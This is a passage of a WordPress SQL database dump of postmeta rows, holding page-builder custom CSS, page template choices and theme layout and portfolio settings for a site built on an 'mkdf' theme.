!important;}'),(25055,1948,'_wpb_shortcodes_custom_css','.vc_custom_1524046525458{padding-top: 82px !important;}.vc_custom_1524046534094{padding-top: 55px !important;padding-bottom: 47px !important;}.vc_custom_1524047631684{padding-top: 50px !important;padding-bottom: 63px !important;}.vc_custom_1534931904860{margin-bottom: 23px !important;border-right-width: 1px !important;padding-top: 0px !important;padding-bottom: 12px !important;border-right-color: #a1a1a1 !important;border-right-style: solid !important;}.vc_custom_1534931913572{margin-bottom: 23px !important;border-right-width: 1px !important;padding-top: 0px !important;padding-bottom: 12px !important;border-right-color: #a1a1a1 !important;border-right-style: solid !important;}.vc_custom_1516615394313{margin-bottom: 23px !important;padding-top: 0px !important;padding-bottom: 12px !important;}'),(25056,1948,'_wpb_shortcodes_custom_css','.vc_custom_1524046525458{padding-top: 82px !important;}.vc_custom_1524046534094{padding-top: 55px !important;padding-bottom: 47px !important;}.vc_custom_1524047631684{padding-top: 50px !important;padding-bottom: 63px !important;}.vc_custom_1534931904860{margin-bottom: 23px !important;border-right-width: 1px !important;padding-top: 0px !important;padding-bottom: 12px !important;border-right-color: #a1a1a1 !important;border-right-style: solid !important;}.vc_custom_1534931913572{margin-bottom: 23px !important;border-right-width: 1px !important;padding-top: 0px !important;padding-bottom: 12px !important;border-right-color: #a1a1a1 !important;border-right-style: solid !important;}.vc_custom_1516615394313{margin-bottom: 23px !important;padding-top: 0px !important;padding-bottom: 12px !important;}'),(25057,1948,'_wpb_shortcodes_custom_css','.vc_custom_1524046525458{padding-top: 82px !important;}.vc_custom_1524046534094{padding-top: 55px !important;padding-bottom: 47px !important;}.vc_custom_1524047631684{padding-top: 50px !important;padding-bottom: 63px !important;}.vc_custom_1534931904860{margin-bottom: 23px !important;border-right-width: 1px !important;padding-top: 0px !important;padding-bottom: 12px !important;border-right-color: #a1a1a1 !important;border-right-style: solid !important;}.vc_custom_1534931913572{margin-bottom: 23px !important;border-right-width: 1px !important;padding-top: 0px !important;padding-bottom: 12px !important;border-right-color: #a1a1a1 !important;border-right-style: solid !important;}.vc_custom_1516615394313{margin-bottom: 23px !important;padding-top: 0px !important;padding-bottom: 12px !important;}'),(25058,1948,'_wpb_shortcodes_custom_css','.vc_custom_1524046525458{padding-top: 82px !important;}.vc_custom_1524046534094{padding-top: 55px !important;padding-bottom: 47px !important;}.vc_custom_1524047631684{padding-top: 50px !important;padding-bottom: 63px !important;}.vc_custom_1534931904860{margin-bottom: 23px !important;border-right-width: 1px !important;padding-top: 0px !important;padding-bottom: 12px !important;border-right-color: #a1a1a1 !important;border-right-style: solid !important;}.vc_custom_1534931913572{margin-bottom: 23px !important;border-right-width: 1px !important;padding-top: 0px !important;padding-bottom: 12px !important;border-right-color: #a1a1a1 !important;border-right-style: solid !important;}.vc_custom_1516615394313{margin-bottom: 23px !important;padding-top: 0px !important;padding-bottom: 12px !important;}'),(25059,1948,'_wp_page_template','full-width.php'),(25060,1948,'slide_template','default'),(25061,1948,'_wpb_vc_js_status','true'),(25062,1948,'mkdf_page_content_behind_header_meta','no'),(25063,1948,'mkdf_disable_vertical_header_background_image_meta','no'),(25064,1948,'mkdf_disable_header_widget_areas_meta','no'),(25065,1948,'mkdf_page_content_padding','105px 0 60px'),(25066,1948,'_dp_original','1904'),(25067,1995,'_wpb_shortcodes_custom_css','.vc_custom_1535012679341{padding-top: 105px !important;padding-bottom: 90px !important;}.vc_custom_1535469268578{padding-top: 105px !important;padding-bottom: 90px !important;}'),(25080,1995,'_wp_page_template','full-width.php'),(25081,1995,'slide_template','default'),(25082,1995,'_wpb_vc_js_status','true'),(25083,1995,'mkdf_page_content_behind_header_meta','no'),(25084,1995,'mkdf_disable_vertical_header_background_image_meta','no'),(25085,1995,'mkdf_disable_header_widget_areas_meta','no'),(25086,1995,'mkdf_page_content_padding','0'),(25087,1995,'_dp_original','1857'),(25088,1995,'_wpb_shortcodes_custom_css','.vc_custom_1535012679341{padding-top: 105px !important;padding-bottom: 90px !important;}.vc_custom_1535469268578{padding-top: 105px !important;padding-bottom: 90px !important;}'),(25089,2019,'_wpb_shortcodes_custom_css','.vc_custom_1535019332070{padding-top: 43px !important;padding-bottom: 100px !important;}'),(25090,2019,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25091,2019,'_wp_page_template','full-width.php'),(25092,2019,'slide_template','default'),(25093,2019,'_wpb_vc_js_status','true'),(25094,2019,'mkdf_page_content_behind_header_meta','no'),(25095,2019,'mkdf_disable_vertical_header_background_image_meta','no'),(25096,2019,'mkdf_disable_header_widget_areas_meta','no'),(25097,2019,'_wpb_shortcodes_custom_css','.vc_custom_1535019332070{padding-top: 43px !important;padding-bottom: 100px !important;}'),(25098,2174,'_wpb_shortcodes_custom_css','.vc_custom_1535640172692{padding-top: 85px !important;padding-bottom: 50px !important;}.vc_custom_1535443981371{padding-top: 85px !important;padding-bottom: 50px !important;}.vc_custom_1535467877810{padding-top: 85px !important;padding-bottom: 50px !important;}'),(25099,2174,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25100,2174,'_wpb_shortcodes_custom_css','.vc_custom_1535640172692{padding-top: 85px !important;padding-bottom: 50px !important;}.vc_custom_1535443981371{padding-top: 85px !important;padding-bottom: 50px !important;}.vc_custom_1535467877810{padding-top: 85px !important;padding-bottom: 50px !important;}'),(25101,2174,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25102,2174,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25103,2174,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25104,2174,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25105,2174,'_wpb_shortcodes_custom_css','.vc_custom_1535640172692{padding-top: 85px !important;padding-bottom: 50px !important;}.vc_custom_1535443981371{padding-top: 85px !important;padding-bottom: 50px !important;}.vc_custom_1535467877810{padding-top: 85px !important;padding-bottom: 50px !important;}'),(25106,2174,'_wpb_shortcodes_custom_css','.vc_custom_1535640172692{padding-top: 85px !important;padding-bottom: 50px !important;}.vc_custom_1535443981371{padding-top: 85px !important;padding-bottom: 50px !important;}.vc_custom_1535467877810{padding-top: 85px !important;padding-bottom: 50px !important;}'),(25107,2174,'_wpb_shortcodes_custom_css','.vc_custom_1535640172692{padding-top: 85px !important;padding-bottom: 50px !important;}.vc_custom_1535443981371{padding-top: 85px !important;padding-bottom: 50px !important;}.vc_custom_1535467877810{padding-top: 85px !important;padding-bottom: 50px !important;}'),(25108,2174,'_wp_page_template','full-width.php'),(25109,2174,'slide_template','default'),(25110,2174,'_wpb_vc_js_status','true'),(25111,2174,'mkdf_page_content_behind_header_meta','no'),(25112,2174,'mkdf_disable_vertical_header_background_image_meta','no'),(25113,2174,'mkdf_disable_header_widget_areas_meta','no'),(25114,2174,'mkdf_page_content_padding','120px 0'),(25115,2174,'_dp_original','1297'),(25116,2387,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25117,2387,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25118,2387,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25119,2387,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25120,2387,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25121,2387,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25122,2387,'_wp_page_template','full-width.php'),(25123,2387,'slide_template','default'),(25124,2387,'_wpb_vc_js_status','true'),(25125,2387,'mkdf_page_content_behind_header_meta','no'),(25126,2387,'mkdf_disable_vertical_header_background_image_meta','no'),(25127,2387,'mkdf_disable_header_widget_areas_meta','no'),(25128,2387,'mkdf_page_content_padding','120px 0 100px'),(25129,2387,'_dp_original','1382'),(25130,2419,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25131,2419,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25132,2419,'_wp_page_template','blog-standard'),(25133,2419,'slide_template','default'),(25134,2419,'_wpb_vc_js_status','false'),(25135,2419,'mkdf_page_content_behind_header_meta','no'),(25136,2419,'mkdf_blog_category_meta','recepies'),(25137,2419,'mkdf_show_posts_per_page_meta','5'),(25138,2419,'mkdf_sidebar_layout_meta','sidebar-25-left'),(25139,2419,'mkdf_disable_vertical_header_background_image_meta','no'),(25140,2419,'mkdf_disable_header_widget_areas_meta','no'),(25141,2419,'mkdf_page_content_padding','120px 0 100px'),(25142,2419,'_dp_original','1679'),(25145,2421,'_wp_page_template','blog-standard'),(25146,2421,'slide_template',''),(25147,2421,'_wpb_vc_js_status','false'),(25148,2421,'mkdf_page_content_behind_header_meta','no'),(25149,2421,'mkdf_blog_category_meta','recepies'),(25150,2421,'mkdf_show_posts_per_page_meta','5'),(25151,2421,'mkdf_sidebar_layout_meta','no-sidebar'),(25152,2421,'mkdf_disable_vertical_header_background_image_meta','no'),(25153,2421,'mkdf_disable_header_widget_areas_meta','no'),(25154,2421,'mkdf_page_content_padding','120px 0 100px'),(25155,2421,'_dp_original','1679'),(25156,2435,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25157,2435,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25158,2435,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25159,2435,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25160,2435,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25161,2435,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25162,2435,'_wp_page_template','full-width.php'),(25163,2435,'slide_template','default'),(25164,2435,'_wpb_vc_js_status','true'),(25165,2435,'mkdf_page_content_behind_header_meta','no'),(25166,2435,'mkdf_disable_vertical_header_background_image_meta','no'),(25167,2435,'mkdf_disable_header_widget_areas_meta','no'),(25168,2435,'mkdf_page_content_padding','120px 0 0'),(25169,2435,'_dp_original','1742'),(25170,2448,'_wpb_shortcodes_custom_css','.vc_custom_1535553249523{padding-top: 100px !important;padding-bottom: 100px !important;background-color: #e7dfdf !important;}'),(25171,2448,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25172,2448,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25173,2448,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25174,2448,'_wp_page_template','full-width.php'),(25175,2448,'slide_template','default'),(25176,2448,'_wpb_vc_js_status','true'),(25177,2448,'mkdf_page_content_behind_header_meta','no'),(25178,2448,'mkdf_page_content_padding','0 0 0 0 '),(25179,2448,'mkdf_page_content_padding_mobile','0 0 0 0'),(25180,2448,'mkdf_set_menu_area_position_meta','center'),(25181,2448,'mkdf_disable_vertical_header_background_image_meta','no'),(25182,2448,'mkdf_menu_area_background_color_meta','#ffffff'),(25183,2448,'mkdf_menu_area_background_transparency_meta','40%'),(25184,2448,'mkdf_disable_header_widget_areas_meta','no'),(25185,2448,'mkdf_show_title_area_meta','no'),(25186,2448,'mkdf_disable_footer_meta','yes'),(25187,2448,'mkdf_header_type_meta','header-standard'),(25188,2448,'mkdf_custom_header_widget_area_one_meta','custom-opener'),(25189,2448,'mkdf_header_behaviour_meta','no-behavior'),(25190,2448,'_dp_original','1811'),(25191,2448,'_wpb_shortcodes_custom_css','.vc_custom_1535553249523{padding-top: 100px !important;padding-bottom: 100px !important;background-color: #e7dfdf !important;}'),(25192,2457,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25193,2457,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25194,2457,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25195,2457,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25196,2457,'_wp_page_template','default'),(25197,2457,'slide_template','default'),(25198,2457,'_wpb_vc_js_status','true'),(25199,2457,'mkdf_page_content_behind_header_meta','no'),(25200,2457,'mkdf_page_content_padding','100px 0 120px 0'),(25201,2457,'mkdf_page_content_padding_mobile','100px 0 120px 0'),(25202,2457,'mkdf_disable_vertical_header_background_image_meta','no'),(25203,2457,'mkdf_disable_header_widget_areas_meta','no'),(25204,2457,'mkdf_title_area_type_meta','attika'),(25205,2457,'_dp_original','1185'),(25206,2472,'_wpb_shortcodes_custom_css','.vc_custom_1533736057368{margin-top: -375px !important;}.vc_custom_1535626950960{margin-top: -60px !important;}.vc_custom_1535627671543{padding-top: 160px !important;padding-bottom: 120px !important;background-color: rgba(237,223,211,0.4) !important;*background-color: rgb(237,223,211) !important;}.vc_custom_1535632790817{padding-right: 10% !important;padding-left: 10% !important;}.vc_custom_1535119322528{margin-top: -20px !important;}'),(25207,2472,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25208,2472,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25209,2472,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25210,2472,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25211,2472,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25212,2472,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25213,2472,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25214,2472,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25215,2472,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25216,2472,'_wp_page_template','full-width.php'),(25217,2472,'slide_template','default'),(25218,2472,'_wpb_vc_js_status','true'),(25219,2472,'mkdf_page_content_behind_header_meta','no'),(25220,2472,'mkdf_disable_vertical_header_background_image_meta','no'),(25221,2472,'mkdf_disable_header_widget_areas_meta','no'),(25222,2472,'mkdf_page_content_padding','120px 0 105px'),(25223,2472,'_dp_original','1662'),(25224,2472,'_wpb_shortcodes_custom_css','.vc_custom_1533736057368{margin-top: -375px !important;}.vc_custom_1535626950960{margin-top: -60px !important;}.vc_custom_1535627671543{padding-top: 160px !important;padding-bottom: 120px !important;background-color: rgba(237,223,211,0.4) !important;*background-color: rgb(237,223,211) !important;}.vc_custom_1535632790817{padding-right: 10% !important;padding-left: 10% !important;}.vc_custom_1535119322528{margin-top: -20px !important;}'),(25225,2477,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25226,2477,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25227,2477,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25228,2477,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25229,2477,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25230,2477,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25231,2477,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25232,2477,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25233,2477,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25234,2477,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25235,2477,'_wp_page_template','full-width.php'),(25236,2477,'slide_template','default'),(25237,2477,'_wpb_vc_js_status','true'),(25238,2477,'mkdf_page_content_behind_header_meta','no'),(25239,2477,'mkdf_disable_vertical_header_background_image_meta','no'),(25240,2477,'mkdf_disable_header_widget_areas_meta','no'),(25241,2477,'mkdf_page_content_padding','120px 0 60px'),(25242,2477,'_dp_original','2472'),(25243,2494,'_wpb_shortcodes_custom_css','.vc_custom_1535628318862{padding-bottom: 70px !important;}.vc_custom_1535629459423{padding-top: 60px !important;padding-bottom: 110px !important;background-color: #f9f5f0 !important;}.vc_custom_1535626873687{padding-right: 10% !important;padding-left: 10% !important;}'),(25244,2494,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25245,2494,'_wpb_shortcodes_custom_css','.vc_custom_1535628318862{padding-bottom: 70px !important;}.vc_custom_1535629459423{padding-top: 60px !important;padding-bottom: 110px !important;background-color: #f9f5f0 !important;}.vc_custom_1535626873687{padding-right: 10% !important;padding-left: 10% !important;}'),(25246,2494,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25247,2494,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25248,2494,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25249,2494,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25250,2494,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25251,2494,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25252,2494,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25253,2494,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25254,2494,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25255,2494,'_wp_page_template','full-width.php'),(25256,2494,'slide_template','default'),(25257,2494,'_wpb_vc_js_status','true'),(25258,2494,'mkdf_page_content_behind_header_meta','no'),(25259,2494,'mkdf_disable_vertical_header_background_image_meta','no'),(25260,2494,'mkdf_disable_header_widget_areas_meta','no'),(25261,2494,'mkdf_page_content_padding','110px 0 155px'),(25262,2494,'_wpb_shortcodes_custom_css','.vc_custom_1535628318862{padding-bottom: 70px !important;}.vc_custom_1535629459423{padding-top: 60px !important;padding-bottom: 110px !important;background-color: #f9f5f0 !important;}.vc_custom_1535626873687{padding-right: 10% !important;padding-left: 10% !important;}'),(25263,2494,'_dp_original','2472'),(25264,2542,'_wpb_shortcodes_custom_css','.vc_custom_1535962435703{padding-top: 80px !important;padding-bottom: 125px !important;}.vc_custom_1535967241855{padding-top: 50px !important;padding-bottom: 95px !important;}.vc_custom_1536937014058{margin-top: -15px !important;}.vc_custom_1537367428822{padding-top: 21% !important;padding-bottom: 18% !important;}'),(25265,2542,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25266,2542,'_wp_page_template','full-width.php'),(25267,2542,'slide_template','default'),(25268,2542,'_wpb_vc_js_status','true'),(25269,2542,'mkdf_page_content_behind_header_meta','no'),(25270,2542,'mkdf_disable_vertical_header_background_image_meta','no'),(25271,2542,'mkdf_disable_header_widget_areas_meta','no'),(25272,2542,'_wpb_shortcodes_custom_css','.vc_custom_1535962435703{padding-top: 80px !important;padding-bottom: 125px !important;}.vc_custom_1535967241855{padding-top: 50px !important;padding-bottom: 95px !important;}.vc_custom_1536937014058{margin-top: -15px !important;}.vc_custom_1537367428822{padding-top: 21% !important;padding-bottom: 18% !important;}'),(25273,2542,'mkdf_page_content_padding','0'),(25274,2542,'mkdf_disable_header_meta','yes'),(25275,2542,'mkdf_show_title_area_meta','no'),(25276,2542,'mkdf_disable_footer_meta','yes'),(25277,2542,'mkdf_smooth_page_transitions_meta','yes'),(25278,2542,'mkdf_page_transition_preloader_meta','yes'),(25279,2542,'mkdf_smooth_pt_spinner_type_meta','pulse'),(25280,2542,'mkdf_smooth_pt_spinner_color_meta','#000000'),(25281,2542,'_wpb_post_custom_css','.mkdf-landing-homes-section {\n    display: none;\n}\n\n.mkdf-landing-bottom-section:after {\n    position: absolute;\n    left: 0;\n    bottom: 0;\n    z-index: -23;\n    width: 29%;\n    height: 476px;\n    background-color: #fef8f7;\n}\n'),(25282,2625,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25283,2625,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25284,2625,'_wp_page_template','default'),(25285,2625,'slide_template','default'),(25286,2625,'_wpb_vc_js_status','true'),(25287,2625,'mkdf_page_content_behind_header_meta','no'),(25288,2625,'mkdf_page_content_padding','120px 0 160px 0'),(25289,2625,'mkdf_page_content_padding_mobile','120px 0 160px 0'),(25290,2625,'mkdf_disable_vertical_header_background_image_meta','no'),(25291,2625,'mkdf_disable_header_widget_areas_meta','no'),(25292,2625,'mkdf_title_area_type_meta','attika'),(25293,2625,'_dp_original','1151'),(25297,2627,'_wp_page_template','default'),(25298,2627,'slide_template','default'),(25299,2627,'_wpb_vc_js_status','true'),(25300,2627,'mkdf_page_content_behind_header_meta','no'),(25301,2627,'mkdf_page_content_padding','120px 0 170px 0'),(25302,2627,'mkdf_page_content_padding_mobile','120px 0 170px 0'),(25303,2627,'mkdf_disable_vertical_header_background_image_meta','no'),(25304,2627,'mkdf_disable_header_widget_areas_meta','no'),(25305,2627,'mkdf_title_area_type_meta','attika'),(25306,2627,'_dp_original','1182'),(25307,2646,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25308,2646,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25309,2646,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25310,2646,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25311,2646,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25312,2646,'_wp_page_template','default'),(25313,2646,'slide_template','default'),(25314,2646,'_wpb_vc_js_status','true'),(25315,2646,'mkdf_page_content_behind_header_meta','no'),(25316,2646,'mkdf_page_content_padding','100px 0 120px 0'),(25317,2646,'mkdf_page_content_padding_mobile','100px 0 120px 0'),(25318,2646,'mkdf_disable_vertical_header_background_image_meta','no'),(25319,2646,'mkdf_disable_header_widget_areas_meta','no'),(25320,2646,'mkdf_title_area_type_meta','attika'),(25321,2646,'_dp_original','2457'),(25323,2652,'_wp_page_template','default'),(25324,2652,'slide_template',''),(25325,2652,'_wpb_vc_js_status','true'),(25326,2652,'mkdf_page_content_behind_header_meta','no'),(25327,2652,'mkdf_disable_vertical_header_background_image_meta','no'),(25328,2652,'mkdf_disable_header_widget_areas_meta','no'),(25329,2652,'mkdf_disable_header_meta','yes'),(25330,2652,'mkdf_show_title_area_meta','no'),(25331,2652,'mkdf_disable_footer_meta','yes'),(25332,2652,'mkdf_page_content_padding','0'),(25333,3075,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25334,3075,'_thumbnail_id','121'),(25335,3075,'mkdf_page_content_behind_header_meta','no'),(25336,3075,'mkdf_page_content_padding','115px 0 100px 0'),(25337,3075,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(25338,3075,'portfolio_single_back_to_link','81'),(25339,3075,'mkdf_disable_vertical_header_background_image_meta','no'),(25340,3075,'mkdf_disable_header_widget_areas_meta','no'),(25341,3075,'slide_template','default'),(25342,3075,'_wpb_vc_js_status','false'),(25343,3075,'mkdf-portfolio-image-gallery','1903,1902,1901'),(25344,3075,'mkdf_portfolio_single_template_meta','images'),(25345,3075,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:11:\" John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(25346,3075,'_wp_old_slug','h1-1'),(25347,3076,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25348,3076,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25349,3076,'_thumbnail_id','137'),(25350,3076,'mkdf_page_content_behind_header_meta','no'),(25351,3076,'mkdf_page_content_padding','115px 0 100px 0'),(25352,3076,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(25353,3076,'portfolio_single_back_to_link','81'),(25354,3076,'mkdf_disable_vertical_header_background_image_meta','no'),(25355,3076,'mkdf_disable_header_widget_areas_meta','no'),(25356,3076,'slide_template','default'),(25357,3076,'_wpb_vc_js_status','true'),(25358,3076,'_dp_original','104'),(25359,3076,'mkdf-portfolio-image-gallery','567,566,565'),(25360,3076,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:11:\" John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(25361,3076,'mkdf_portfolio_single_template_meta','small-images'),(25362,3076,'_wp_old_slug','h1-2'),(25363,3077,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25364,3077,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25365,3077,'_thumbnail_id','138'),(25366,3077,'mkdf_page_content_behind_header_meta','no'),(25367,3077,'mkdf_page_content_padding','115px 0 100px 0'),(25368,3077,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(25369,3077,'portfolio_single_back_to_link','81'),(25370,3077,'mkdf_disable_vertical_header_background_image_meta','no'),(25371,3077,'mkdf_disable_header_widget_areas_meta','no'),(25372,3077,'slide_template','default'),(25373,3077,'_wpb_vc_js_status','true'),(25374,3077,'_dp_original','104'),(25375,3077,'mkdf-portfolio-image-gallery','1901,1902,1903'),(25376,3077,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:10:\"John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(25377,3077,'mkdf_portfolio_single_template_meta','slider'),(25378,3077,'_wp_old_slug','h1-3'),(25379,3077,'_wp_old_slug','homemade-dining'),(25380,3078,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25381,3078,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25382,3078,'_thumbnail_id','571'),(25383,3078,'mkdf_page_content_behind_header_meta','no'),(25384,3078,'mkdf_page_content_padding','115px 0 100px 0'),(25385,3078,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(25386,3078,'portfolio_single_back_to_link','569'),(25387,3078,'mkdf_disable_vertical_header_background_image_meta','no'),(25388,3078,'mkdf_disable_header_widget_areas_meta','no'),(25389,3078,'slide_template','default'),(25390,3078,'_wpb_vc_js_status','true'),(25391,3078,'mkdf-portfolio-image-gallery','565,566,567'),(25392,3078,'mkdf_portfolio_single_template_meta','small-slider'),(25393,3078,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:11:\" John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(25394,3078,'_dp_original','104'),(25395,3078,'_wp_old_slug','h8-1'),(25396,3079,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25397,3079,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25398,3079,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25399,3079,'mkdf_page_content_behind_header_meta','no'),(25400,3079,'mkdf_page_content_padding','115px 0 100px 0'),(25401,3079,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(25402,3079,'portfolio_single_back_to_link','569'),(25403,3079,'mkdf_disable_vertical_header_background_image_meta','no'),(25404,3079,'mkdf_disable_header_widget_areas_meta','no'),(25405,3079,'slide_template','default'),(25406,3079,'_wpb_vc_js_status','true'),(25407,3079,'mkdf-portfolio-image-gallery','567,566,565'),(25408,3079,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:11:\" John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(25409,3079,'mkdf_portfolio_single_template_meta','gallery'),(25410,3079,'_dp_original','136'),(52092,4354,'_menu_item_menu_item_parent','0'),(25412,3079,'_wp_old_slug','h8-2'),(25413,3080,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25414,3080,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25415,3080,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25416,3080,'_thumbnail_id','584'),(25417,3080,'mkdf_page_content_behind_header_meta','no'),(25418,3080,'mkdf_page_content_padding','115px 0 100px 0'),(25419,3080,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(25420,3080,'portfolio_single_back_to_link','569'),(25421,3080,'mkdf_disable_vertical_header_background_image_meta','no'),(25422,3080,'mkdf_disable_header_widget_areas_meta','no'),(25423,3080,'slide_template','default'),(25424,3080,'_wpb_vc_js_status','true'),(25425,3080,'mkdf-portfolio-image-gallery','567,566,565'),(25426,3080,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:10:\"John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(25427,3080,'mkdf_portfolio_single_template_meta','small-images'),(25428,3080,'_dp_original','141'),(25429,3080,'_wp_old_slug','h8-3'),(25430,3081,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25431,3081,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25432,3081,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25433,3081,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25434,3081,'_thumbnail_id','589'),(25435,3081,'mkdf_page_content_behind_header_meta','no'),(25436,3081,'mkdf_page_content_padding','115px 0 100px 0'),(25437,3081,'mkdf_page_content_padding_mobile','100px 0 100px 